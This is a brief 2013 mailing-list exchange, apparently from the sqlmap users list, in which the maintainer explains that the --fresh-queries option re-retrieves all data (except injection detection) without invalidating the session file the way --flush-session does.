From: Владимир М. <vil...@gm...> - 2013-02-13 09:50:06
|
On 2013/2/13 Miroslav Stampar <mir...@gm...> wrote:
> all data again (excluding SQLi detection), but it won't invalidate
> previous data in session file (like --flush-session).
>

OK, Thank you! |
From: Miroslav S. <mir...@gm...> - 2013-02-13 09:47:40
|
all data again (excluding SQLi detection), but it won't invalidate previous data in session file (like --flush-session).

there is no way to make a new switch to invalidate just one entry for this and that inside the whole sqlmap workflow.

On Wed, Feb 13, 2013 at 10:45 AM, Владимир Мартьянов <vil...@gm...> wrote:
> Will --fresh-queries work only with data containing errors or will it
> retrieve all data again?
>

--
Miroslav Stampar
http://about.me/stamparm |